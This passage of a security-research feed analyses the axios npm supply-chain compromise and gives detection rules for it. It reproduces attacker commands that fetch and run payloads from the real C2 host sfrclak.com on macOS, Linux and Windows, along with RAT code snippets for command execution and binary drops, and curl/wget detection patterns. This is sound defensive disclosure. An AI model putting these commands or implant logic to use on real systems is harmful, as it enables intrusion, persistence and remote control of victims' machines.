<td>None</td>
</tr>
</tbody>
</table>
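<p>The routing logic is simple enough to sketch. The following Python fragment mirrors the platform branch described above; names are ours, the real dropper is JavaScript, and no request is actually sent here:</p>
<pre><code class="language-py">C2_URL = 'http://sfrclak[.]com:8000/6202033'

# Node.js os.platform() values mapped to the product bodies served by the C2
PLATFORM_BODIES = {
    'darwin': 'packages.npm.org/product0',  # macOS
    'win32': 'packages.npm.org/product1',   # Windows
    'linux': 'packages.npm.org/product2',   # Linux
}

def build_stage2_request(platform):
    # Returns the (url, body) pair the dropper would POST for this platform;
    # the npm-registry-style body makes the traffic look like package metadata
    body = PLATFORM_BODIES.get(platform)
    if body is None:
        return None  # unsupported platform: no delivery attempt
    return C2_URL, body
</code></pre>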
<h3>Anti-forensics</h3>
<p>The dropper performs two cleanup actions:</p>
<ol>
<li><strong>Self-deletion:</strong> <code>setup.js</code> removes itself via <code>fs.unlink(__filename)</code></li>
<li><strong>Package manifest swap:</strong> A clean file named <code>package.md</code> (containing a benign version 4.2.0 configuration with no <code>postinstall</code> hook) is renamed to <code>package.json</code>, overwriting the malicious version</li>
</ol>
<p>Post-incident inspection of <code>node_modules/plain-crypto-js/package.json</code> reveals no trace of the <code>postinstall</code> trigger. The malicious <code>setup.js</code> is gone. Only the lockfile and npm audit logs retain evidence.</p>
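<p>Reduced to its essentials, the cleanup is one delete and one rename. A Python equivalent (the original uses Node.js <code>fs</code> calls; paths follow the description above):</p>
<pre><code class="language-py">import os

def cleanup(package_dir):
    # 1. Self-deletion: remove the dropper script from disk
    os.remove(os.path.join(package_dir, 'setup.js'))
    # 2. Manifest swap: the clean package.md (version 4.2.0, no postinstall
    #    hook) overwrites the malicious package.json
    os.replace(os.path.join(package_dir, 'package.md'),
               os.path.join(package_dir, 'package.json'))
</code></pre>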
<h3>Stage 2: Cross-platform RAT</h3>
<p>The three stage-2 payloads (PowerShell for Windows, compiled C++ for macOS, and Python for Linux) are not three different tools. They are three implementations of the <strong>same RAT specification</strong>, sharing an identical C2 protocol, command set, message format, and operational behavior. The consistency strongly indicates a single developer or a tightly coordinated team working from a shared design document.</p>
<h4>Shared architecture</h4>
<p>The following properties are <strong>identical across all three variants:</strong></p>
<ul>
<li><strong>C2 transport: HTTP POST</strong></li>
<li><strong>Body encoding: Base64-encoded JSON</strong></li>
<li><strong>User-Agent: <code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></strong></li>
<li><strong>Beacon interval: 60 seconds</strong></li>
<li><strong>Session UID: 16-character random alphanumeric string, generated per-execution</strong></li>
<li><strong>Outbound message types: <code>FirstInfo</code>, <code>BaseInfo</code>, <code>CmdResult</code></strong></li>
<li><strong>Inbound command types: <code>kill</code>, <code>peinject</code>, <code>runscript</code>, <code>rundir</code></strong></li>
<li><strong>Response command types: <code>rsp_kill</code>, <code>rsp_peinject</code>, <code>rsp_runscript</code>, <code>rsp_rundir</code></strong></li>
</ul>
<p>The spoofed IE8/Windows XP user-agent string is particularly notable: it is anachronistic on all three platforms, and its presence on a macOS or Linux host is a strong detection indicator.</p>
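<p>To illustrate the shared envelope, here is a minimal Python sketch of the UID generation and message encoding. The message types and Base64-encoded JSON transport are documented behavior; the inner field names are our assumption for illustration:</p>
<pre><code class="language-py">import base64
import json
import random
import string

USER_AGENT = 'mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)'

def new_session_uid():
    # 16-character random alphanumeric UID, regenerated on every execution
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def encode_message(msg_type, uid, payload):
    # Wrap a FirstInfo / BaseInfo / CmdResult message as Base64-encoded JSON,
    # the POST body format shared by all three variants
    body = {'type': msg_type, 'uid': uid, 'data': payload}
    return base64.b64encode(json.dumps(body).encode())

def decode_message(raw):
    # Inverse used by the C2 (and by analysts replaying captured traffic)
    return json.loads(base64.b64decode(raw))
</code></pre>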
<h4>Initialization and reconnaissance</h4>
<p>On startup, each variant:</p>
<ol>
<li><strong>Generates a session UID</strong> — 16 random alphanumeric characters, included in every subsequent C2 message</li>
<li><strong>Detects OS and architecture</strong> — reports platform-specific identifiers (e.g., windows_x64, macOS, linux_x64)</li>
<li><strong>Enumerates initial directories</strong> of interest (user profile, documents, desktop, config directories)</li>
<li><strong>Sends a FirstInfo beacon</strong> containing the UID, OS identifier, and directory snapshot</li>
</ol>
<p>After initialization, the implant enters the main loop. The first BaseInfo heartbeat includes a comprehensive system profile. The same categories of data are collected on all platforms, though the underlying APIs differ:</p>
<table>
<thead>
<tr>
<th>Data Collected</th>
<th>Windows Source</th>
<th>macOS Source</th>
<th>Linux Source</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hostname</td>
<td>%COMPUTERNAME% env var</td>
<td>gethostname()</td>
<td>/proc/sys/kernel/hostname</td>
</tr>
<tr>
<td>Username</td>
<td>%USERNAME% env var</td>
<td>getuid() + getpwuid()</td>
<td>os.getlogin()</td>
</tr>
<tr>
<td>OS version</td>
<td>WMI / registry</td>
<td>sysctlbyname(&quot;kern.osproductversion&quot;)</td>
<td>platform.system() + platform.release()</td>
</tr>
<tr>
<td>Timezone</td>
<td>System timezone</td>
<td>localtime_r()</td>
<td>datetime.timezone</td>
</tr>
<tr>
<td>Boot time</td>
<td>System uptime</td>
<td>sysctl(&quot;kern.boottime&quot;)</td>
<td>/proc/uptime</td>
</tr>
<tr>
<td>Install date</td>
<td>Registry / WMI</td>
<td>stat(&quot;/&quot;) or sysctl</td>
<td>ctime of /var/log/installer or /var/log/dpkg.log</td>
</tr>
<tr>
<td>Hardware model</td>
<td>WMI</td>
<td>sysctlbyname(&quot;hw.model&quot;)</td>
<td>/sys/class/dmi/id/product_name</td>
</tr>
<tr>
<td>CPU type</td>
<td>WMI</td>
<td>sysctlbyname()</td>
<td>platform.machine()</td>
</tr>
<tr>
<td>Process list</td>
<td>Full PID, session, name, path</td>
<td>popen(&quot;ps&quot;) (up to 1000)</td>
<td>Full /proc enumeration (PID, PPID, user, cmdline)</td>
</tr>
</tbody>
</table>
<p>Subsequent heartbeats are lightweight, containing only a timestamp to confirm the implant is alive.</p>
<h4>Command dispatch</h4>
<p>The C2 response is parsed as JSON, and the type field determines the action. All three variants implement the same four commands:</p>
<p><strong>kill — Self-termination.</strong> Sends an <code>rsp_kill</code> acknowledgment and exits. The Windows variant's persistence mechanism (registry key + batch file) survives the <code>kill</code> command unless explicitly cleaned up; the macOS and Linux variants have no persistence of their own.</p>
<p><strong>runscript — Script/command execution.</strong> The operator's primary interaction command. Accepts a <code>Script</code> field (code to execute) and a <code>Param</code> field (arguments). When <code>Script</code> is empty, <code>Param</code> is run directly as a command. The execution mechanism is platform-native:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Execution Mechanism</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>PowerShell with -NoProfile -ep Bypass</td>
</tr>
<tr>
<td>macOS</td>
<td>AppleScript via /usr/bin/osascript</td>
</tr>
<tr>
<td>Linux</td>
<td>Shell via subprocess.run(shell=True) or Python via python3 -c</td>
</tr>
</tbody>
</table>
<p><strong>peinject — Binary payload delivery.</strong> Despite the Windows-centric naming (&quot;PE inject&quot;), all three platforms implement this as a way to drop and execute binary payloads:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Implementation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>Reflective .NET assembly loading via [System.Reflection.Assembly]::Load()</td>
</tr>
<tr>
<td>macOS</td>
<td>Base64-decodes and drops a binary, executes with operator-supplied parameters.</td>
</tr>
<tr>
<td>Linux</td>
<td>Base64-decodes a binary to /tmp/.&lt;random 6-char string&gt; (hidden file), launches via subprocess.Popen().</td>
</tr>
</tbody>
</table>
<p>The Windows implementation achieves in-memory execution with no file drop, but it does not disable AMSI, which will almost certainly flag the assembly load. The macOS and Linux variants take the simpler approach of writing a binary to disk and executing it directly.</p>
<p><strong>rundir — Directory enumeration.</strong> Accepts paths and returns detailed file listings (name, size, type, creation/modification timestamps, child count for directories). Allows the operator to interactively browse the filesystem.</p>
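<p>The dispatch pattern common to all three variants can be sketched in a few lines of Python. Handler internals are stubbed out; only the <code>type</code>-based routing and the <code>rsp_*</code> acknowledgments reflect documented behavior:</p>
<pre><code class="language-py">import json

# Documented inbound command types and their response types
RESPONSES = {
    'kill': 'rsp_kill',
    'peinject': 'rsp_peinject',
    'runscript': 'rsp_runscript',
    'rundir': 'rsp_rundir',
}

def dispatch(raw_response, handlers):
    # Parse a C2 response and route on its type field. `handlers` maps
    # command types to callables; the real implants use platform-native
    # handlers (PowerShell, osascript, subprocess). Returns the CmdResult
    # acknowledgment, or None for an unrecognized type.
    cmd = json.loads(raw_response)
    cmd_type = cmd.get('type')
    if cmd_type not in RESPONSES or cmd_type not in handlers:
        return None
    return {'type': RESPONSES[cmd_type], 'result': handlers[cmd_type](cmd)}
</code></pre>
<p>A <code>runscript</code> handler on Linux, for example, would run <code>Param</code> through the shell whenever <code>Script</code> is empty, matching the behavior described above.</p>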
<h4>Capability summary</h4>
<table>
<thead>
<tr>
<th>Capability</th>
<th>Windows (PowerShell)</th>
<th>macOS (C++)</th>
<th>Linux (Python)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Persistence</td>
<td>Registry Run key + hidden .bat</td>
<td>None</td>
<td>None</td>
</tr>
<tr>
<td>Script execution</td>
<td>PowerShell</td>
<td>AppleScript via osascript</td>
<td>Shell or Python inline</td>
</tr>
<tr>
<td>Binary injection</td>
<td>Reflective .NET load injecting into cmd.exe</td>
<td>Binary drop + execute</td>
<td>Binary drop to /tmp/ + execute</td>
</tr>
<tr>
<td>Anti-forensics</td>
<td>Hidden windows, temp file cleanup</td>
<td>Hidden temp .scpt</td>
<td>Hidden /tmp/.XXXXXX files</td>
</tr>
</tbody>
</table>
<h2>Attribution</h2>
<p>The macOS Mach-O binary delivered by the <code>plain-crypto-js</code> postinstall hook exhibits significant overlap with <strong>WAVESHAPER</strong>, a C++ backdoor tracked by Mandiant and attributed to <strong>UNC1069</strong>, a DPRK-linked threat cluster.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image1.png" alt="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" title="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" /></p>
<h2>Conclusion</h2>
<p>This campaign demonstrates the continued attractiveness of the npm ecosystem as a supply chain attack vector. By compromising a single maintainer account on one of the JavaScript ecosystem's most depended-upon packages, the attacker gained a delivery mechanism with potential reach into millions of environments.</p>
<p>The toolkit's most reliable detection indicator is also its most curious design choice: the IE8/Windows XP user-agent string hardcoded identically across all three platform variants. While it provides a consistent protocol fingerprint for C2 server-side routing, it is trivially detectable on any modern network — and is an immediate anomaly on macOS and Linux hosts.</p>
<p>Elastic Security Labs will continue monitoring this activity cluster and will update this post with any additional findings.</p>
<h2>MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1195/001/">Supply Chain Compromise: Compromise Software Dependencies</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/007/">Command and Scripting Interpreter: JavaScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/004/">Command and Scripting Interpreter: Unix Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/006/">Command and Scripting Interpreter: Python</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/001/">Boot or Logon Autostart Execution: Registry Run Keys</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1564/001/">Hidden Files and Directories</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/004/">Indicator Removal: File Deletion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1083/">File and Directory Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1071/001/">Application Layer Protocol: Web Protocols</a></li>
<li><a href="https://attack.mitre.org/techniques/T1571/">Non-Standard Port</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132/001/">Data Encoding: Standard Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
</ul>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>6202033.ps1</code></td>
<td align="left">Windows payload</td>
</tr>
<tr>
<td align="left"><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>com.apple.act.mond</code></td>
            <td align="left">macOS payload</td>
</tr>
<tr>
<td align="left"><code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>ld.py</code></td>
<td align="left">Linux payload</td>
</tr>
<tr>
<td align="left"><code>sfrclak[.]com</code></td>
<td align="left">DOMAIN</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
<tr>
<td align="left"><code>142.11.206[.]73</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/axios-one-rat-to-rule-them-all.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases detections for the Axios supply chain compromise]]></title>
            <link>https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</link>
            <guid>axios-supply-chain-compromise-detections</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Hunting and detection rules for the Elastic-discovered Axios supply chain compromise.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs is releasing initial triage guidance and detection rules for the Axios supply-chain compromise. We have <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">released a detailed analysis</a> of the Axios compromise RAT and payloads.</p>
</blockquote>
<blockquote>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on March 31, 2026 at 01:50 AM UTC to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
</blockquote>
<h2>Introduction</h2>
<p>We are currently tracking a supply chain attack involving malicious Axios package versions that introduce a secondary dependency used for post-install execution. Rather than embedding malicious logic directly into the primary package, the attacker leveraged a transitive dependency to trigger execution during installation and deploy a cross-platform payload.</p>
<p>Elastic observed consistent execution patterns across impacted systems immediately after <code>npm install</code> of the malicious Axios versions (<code>1.14.1</code>, <code>0.30.4</code>). The added dependency (<code>plain-crypto-js@4.2.1</code>) executed during <code>postinstall</code> and was quickly followed by a second-stage payload.</p>
<p>Across Linux, Windows, and macOS, the activity followed the same structure:</p>
<pre><code>node (npm install)
  → OS-native execution (sh / cscript / osascript)
    → remote payload retrieval
      → backgrounded or hidden execution of stage 2
</code></pre>
<p>This results in a small but high-signal window where:</p>
<ul>
<li><code>node</code> spawns a shell or interpreter</li>
<li>a remote payload is fetched</li>
<li>execution is detached from the original process</li>
</ul>
<p>Elastic detections triggered reliably on this behavior across platforms, providing strong coverage of the delivery stage.</p>
<h2>How Elastic Detects the Supply Chain Attack</h2>
<p>This activity consistently appears in process telemetry as a Node.js process spawning an OS-native execution path to retrieve and execute a remote payload, often in a detached or hidden context. Elastic detections focus on this behavior rather than static indicators, providing reliable coverage of the delivery stage across platforms.</p>
<h3>Linux</h3>
<p>The Linux execution path is the cleanest place to start, because the malware does very little to hide what it is doing. We observed that the delivery stage produced exactly the kind of process ancestry you would expect from a compromised dependency:</p>
<pre><code>node → /bin/sh -c curl -o /tmp/ld.py ... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;
</code></pre>
<p>Which shows up as follows:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image6.png" alt="Elastic alerts triggering on backdoor execution" /></p>
<p>The initial signal comes from the Node.js process handing off execution to a shell that performs a remote fetch. This is captured by the <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via Node.js</a> detection rule.</p>
<pre><code>event.category:process and
process.parent.name:(&quot;node&quot; or &quot;bun&quot; or &quot;node.exe&quot; or &quot;bun.exe&quot;) and 
(
  (
    process.name:(
      &quot;bash&quot; or &quot;dash&quot; or &quot;sh&quot; or &quot;tcsh&quot; or &quot;csh&quot; or  &quot;zsh&quot; or &quot;ksh&quot; or
      &quot;fish&quot; or &quot;cmd.exe&quot; or &quot;bash.exe&quot; or &quot;powershell.exe&quot;
    ) and
    process.command_line:(*curl*http* or *wget*http*)
  ) or 
  process.name:(&quot;curl&quot; or &quot;wget&quot; or &quot;curl.exe&quot; or &quot;wget.exe&quot;)
)
</code></pre>
<p>This captures the moment when the installation flow deviates from normal package behavior and begins pulling a payload over HTTP. In this case, it is the <code>curl</code> invocation that retrieves <code>/tmp/ld.py</code> from the remote server.</p>
<p>Shortly after, execution continues in the same shell, but now the focus shifts from retrieval to execution. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a>.</p>
<pre><code>event.category:process and event.type:start and
process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and
process.args:(-c and *&amp;)
</code></pre>
<p>Which captures the second half of the chain:</p>
<pre><code>sh -c &quot;... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;&quot;
</code></pre>
<p>The payload is launched with <code>nohup</code> and backgrounded immediately using <code>&amp;</code>, detaching it from the parent process and suppressing output. That transition from a short-lived install-time shell into a detached long-running process is where the actual implant takes over.</p>
<p>After execution, the Linux second stage is a Python-based RAT that establishes a simple polling loop to its C2. The entrypoint <code>work()</code> sends an initial <code>FirstInfo</code> message and then transitions into <code>main_work()</code>, which continuously reports host data and processes tasking:</p>
<pre><code class="language-py">while True:
    ps = print_process_list()

    data = {
        &quot;hostname&quot;: get_host_name(),
        &quot;username&quot;: get_user_name(),
        &quot;os&quot;: os,
        &quot;processList&quot;: ps
    }

    response_content = send_result(url, body)

    if response_content:
        process_request(url, uid, response_content)

    time.sleep(60)
</code></pre>
<p>On first check-in, it performs a targeted directory enumeration via <code>init_dir_info()</code> across user paths such as <code>$HOME</code>, <code>.config</code>, <code>Documents</code>, and <code>Desktop</code>, and builds a process listing directly from <code>/proc</code>, including usernames and start times.</p>
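<p>That first-check-in enumeration can be approximated in a few lines (a simplified reconstruction of <code>init_dir_info()</code>; the real implant also records per-entry sizes and timestamps):</p>
<pre><code class="language-py">import os

def init_dir_info(max_entries=100):
    # Snapshot the user paths the implant profiles on first check-in
    home = os.path.expanduser('~')
    targets = [
        home,
        os.path.join(home, '.config'),
        os.path.join(home, 'Documents'),
        os.path.join(home, 'Desktop'),
    ]
    snapshot = {}
    for path in targets:
        try:
            snapshot[path] = sorted(os.listdir(path))[:max_entries]
        except OSError:
            snapshot[path] = None  # path absent or unreadable
    return snapshot
</code></pre>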
<p>Tasking is minimal but flexible. <code>runscript</code> supports arbitrary shell execution or base64-delivered Python via <code>python3 -c</code>, while <code>peinject</code> simply writes attacker-supplied bytes to a hidden file in <code>/tmp</code> and executes it:</p>
<pre><code class="language-py">file_path = f&quot;/tmp/.{generate_random_string(6)}&quot;
with open(file_path, &quot;wb&quot;) as file:
    file.write(payload)

os.chmod(file_path, 0o777)
subprocess.Popen([file_path] + shlex.split(param.decode(&quot;utf-8&quot;)))
</code></pre>
<p>This provides the operator with a lightweight access implant for periodic host profiling, command execution, and follow-on payload delivery.</p>
<p>Together, these detections provide strong coverage of the Linux delivery stage and the transition into the Python backdoor, without relying on specific filenames or hardcoded indicators:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via Node.js</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></li>
</ul>
<h3>Windows</h3>
<p>The Windows execution path follows the same pattern: it uses curl to download a remote PowerShell script and proxies execution through a renamed copy of PowerShell (<code>C:\ProgramData\wt.exe</code>). The following alert shows the process chain:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image5.png" alt="Elastic - Alert Process Tree" title="Elastic - Alert Process Tree" /></p>
<p>Where:</p>
<ul>
<li><code>wt.exe</code> is a renamed copy of <code>PowerShell.exe</code> located in <code>C:\ProgramData\wt.exe</code></li>
<li><code>curl</code> is used to retrieve a remote PowerShell script</li>
<li>execution is performed via the renamed binary</li>
</ul>
<p>We first observe the creation and use of the renamed interpreter. This is captured by <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a>, which flags signed system binaries executed from unexpected locations.</p>
<p>Shortly after, the same binary is used to retrieve the second-stage payload over HTTP. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a>, capturing the network retrieval stage driven from the scripted execution chain.</p>
<p>The second stage is a PowerShell-based RAT that beacons to its C2 (<code>http[:]//sfrclak[.]com:8000/</code>) every 60 seconds over HTTP using a fake IE8 User-Agent and base64-encoded JSON.</p>
<p>It establishes persistence via a <code>Run\MicrosoftUpdate</code> registry key that executes a hidden batch script, <code>C:\ProgramData\system.bat</code>.</p>
<p>The batch file dynamically retrieves and executes the payload in memory on login:</p>
<pre><code>start /min powershell -w h -c &quot;
([scriptblock]::Create(
  [System.Text.Encoding]::UTF8.GetString(
    (Invoke-WebRequest -UseBasicParsing -Uri '' -Method POST -Body 'packages.npm.org/product1').Content
  )
)) ''&quot;
</code></pre>
<p>Its core capabilities include:</p>
<ul>
<li><strong>peinject</strong> - in-memory .NET assembly injection using Assembly.Load(byte[]) for process hollowing into cmd.exe.</li>
<li><strong>runscript</strong> - arbitrary PowerShell script execution via encoded commands or temp files.</li>
<li><strong>rundir</strong> - filesystem enumeration of user directories and all drive roots.</li>
</ul>
<p>On initialization, it fingerprints the host via WMI, collecting hostname, username, OS version, CPU, hardware model, timezone, boot/install times, and a full process listing, and sends an initial directory listing of Documents, Desktop, OneDrive, and AppData before entering its beacon loop.</p>
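<p>For defenders replaying captured beacons, the survey data has a predictable shape. The following Python sketch collects analogous fields with the standard library instead of WMI, purely to illustrate what the initial check-in contains:</p>

```python
import datetime
import getpass
import platform

def survey_host() -> dict:
    """Collect fingerprint fields analogous to the RAT's WMI survey.
    The real implant gathers hostname, username, OS version, CPU,
    hardware model, timezone, boot/install times, and a process list;
    this sketch covers the portable subset for illustration only."""
    return {
        "hostname": platform.node(),
        "username": getpass.getuser(),
        "os_version": platform.platform(),
        "cpu": platform.processor(),
        "timezone": str(datetime.datetime.now().astimezone().tzinfo),
    }
```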
<p>The second stage triggers both the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a> alerts:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image2.png" alt="" /></p>
<p>The <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a> rule alert captures the PowerShell RAT script content :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image1.png" alt="" /></p>
<p>Taken together, these rules capture the full Windows delivery chain, from renamed binary execution through payload retrieval and persistence to in-memory execution:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></li>
</ul>
<h3>macOS</h3>
<p>Analysis shows the loader writes AppleScript to a temp file, runs it via <code>osascript</code>, then downloads the second stage to a fake Apple-looking cache path and launches it through <code>/bin/zsh</code>. The key launcher looks like this:</p>
<pre><code>do shell script &quot;curl -o /Library/Caches/com.apple.act.mond \
 -d packages.npm.org/product0 \
 -s http://sfrclak.com:8000/6202033 \
 &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
 &amp;&amp; /bin/zsh -c \&quot;/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;\&quot; \ &amp;&gt; /dev/null&quot;
</code></pre>
<p>The delivered file produced the following detection, matching on the file name masquerading attempt and the self-signed code signature:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image3.png" alt="Elastic Defend behavior alert triggering on the macOS backdoor" title="Elastic Defend behavior alert triggering on the macOS backdoor" /></p>
<p>The payload path itself triggers the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a> endpoint rules, as it mimics Apple naming conventions (<code>com.apple.*</code>) but does not match expected signing characteristics.</p>
<p><code>com.apple.act.mond</code> is a custom-built macOS backdoor compiled as a universal Mach-O binary (x86_64 and ARM64) using C++ and Xcode, with HTTP-based C2 communications via <code>libcurl</code> and a JSON command protocol.</p>
<p>On initial check-in, it fingerprints the host, collecting hostname, username, OS version, hardware model, timezone, and a full process listing (<code>ps -eo user,pid,command</code>), which surfaces via the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a> endpoint rule, capturing unexpected child process activity originating from the backdoor:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image4.png" alt="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" title="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" /></p>
